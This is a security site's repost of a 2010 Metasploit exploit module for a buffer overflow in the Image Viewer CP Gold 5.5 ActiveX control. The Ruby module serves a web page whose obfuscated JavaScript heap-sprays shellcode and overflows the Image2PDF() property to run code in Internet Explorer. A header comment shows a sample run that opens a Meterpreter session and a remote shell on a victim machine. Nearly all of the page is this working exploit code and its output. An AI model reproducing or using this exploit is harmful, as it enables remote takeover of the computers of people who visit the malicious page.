首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Image Viewer CP Gold v5.5 Image2PDF() Buffer Overflow (msf)
来源:bz1p (AT) bshellz.net 作者:bz1p 发布时间:2010-12-03  

# Image Viewer CP gold v5.5 Buffer Overflow
# Found by: bz1p (AT) bshellz.net
# Impact: Low, NOT marked safe for scripting or initializing
# CVE: ? (0day)
#
# msf exploit(image_viewer_cpgold) >
# [*] Sending exploit to 172.17.120.211:1061...
# [*] Sending stage (749056 bytes) to 172.17.120.211
# [*] Meterpreter session 1 opened (172.17.120.235:4443 -> 172.17.120.211:1064) at 2010-11-15 18:11:32 +1100
#
# msf exploit(image_viewer_cpgold) > sessions -l
#
# Active sessions
# ===============
#
#   Id  Type                   Information            Connection
#   --  ----                   -----------            ----------
#   1   meterpreter x86/win32  VICTIMXP\victim @ VICTIM  172.17.120.235:4443 -> 172.17.120.211:1064
#
# msf exploit(image_viewer_cpgold) > sessions -i 1
# [*] Starting interaction with 1...
#
# meterpreter > shell
# Process 3536 created.
# Channel 1 created.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\victim\Desktop>

################################### Start ###################################

##
# $Id: image_viewer_cpgold.rb 10429 2010-12-03 18:46:29Z bz1p $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Image Viewer CP Gold ActiveX Control Buffer Overflow',
   'Description'    => %q{
     This module exploits a stack buffer overflow in NImage Viewer CP Gold ActiveX Control 5.5. When
    sending an overly long string to the Image2PDF() property of ImageViewer2.ocx
    an attacker may be able to execute arbitrary code.
   },
   'License'        => MSF_LICENSE,
   'Author'         => [ 'bz1p (0xbz1p[<AT>]gmail.com)' ],
   'Version'        => '$Revision: 10429 $',
   'References'     =>
    [
     [ 'CVE', '-' ],
     [ 'OSVDB', '-'],
     [ 'BID', '-' ],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
    },
   'Payload'        =>
    {
     'Space'         => 1024,
     'BadChars'      => "\x00\x03\x04\x05\x06",
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
    ],
   'DiscoveryDate' => 'Oct 15 2010',
   'DisclosureDate' => 'Dec 2 2010',
   'DefaultTarget'  => 0))
 end

 def autofilter
  false
 end

 def check_dependencies
  use_zlib
 end

 def on_request_uri(cli, request)
  # Re-generate the payload.
  return if ((p = regenerate_payload(cli)) == nil)

  # Encode the shellcode.
  shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

  # Create some nops.
  nops    = Rex::Text.to_unescape(make_nops(4))

  # Set the return.
  ret     = Rex::Text.uri_encode([target.ret].pack('L'))

  # Randomize the javascript variable names.
  vname  = rand_text_alpha(rand(100) + 1)
  var_i  = rand_text_alpha(rand(30)  + 2)
  rand1  = rand_text_alpha(rand(100) + 1)
  rand2  = rand_text_alpha(rand(100) + 1)
  rand3  = rand_text_alpha(rand(100) + 1)
  rand4  = rand_text_alpha(rand(100) + 1)
  rand5  = rand_text_alpha(rand(100) + 1)
  rand6  = rand_text_alpha(rand(100) + 1)
  rand7  = rand_text_alpha(rand(100) + 1)
  rand8  = rand_text_alpha(rand(100) + 1)

  content = %Q|
   <html>
   <object id='#{vname}' classid='clsid:E589DA78-AD4C-4FC5-B6B9-9E47B110679E'></object>
   <script language="JavaScript">
   var #{rand1} = unescape('#{shellcode}');
   var #{rand2} = unescape('#{nops}');
   var #{rand3} = 20;
   var #{rand4} = #{rand3} + #{rand1}.length;
   while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
   var #{rand5} = #{rand2}.substring(0,#{rand4});
   var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
   while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
   var #{rand7} = new Array();
   for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
   var #{rand8} = ""
   for (#{var_i} = 0; #{var_i} < 8500; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
   #{vname}.Image2PDF("lolznoaslrdepbypass", #{rand8});
   </script>
   </html>
   |

  content = Rex::Text.randomize_space(content)

  print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

  # Transmit the response to the client
  send_response_html(cli, content)

  # Handle the payload
  handler(cli)
 end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeTrim MP3 2.2.3 Denial of S
·ProFTPD 1.3.3c compromised sou
·MediaCoder 0.7.5.4795 .m3u Buf
·J-Integra v2.11 ActiveX SetIde
·iFTPStorage for iPhone / iPod
·Apple Directory Services Memor
·EnjoySAP SAP GUI ActiveX Contr
·HP Data Protector Manager A.06
·ProFTPD-1.3.3c Backdoor Comman
·J-Integra v2.11 Remote Code Ex
·Image Viewer CP Gold 6 ActiveX
·Provj 5.1.5.5 (m3u) Buffer Ove
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved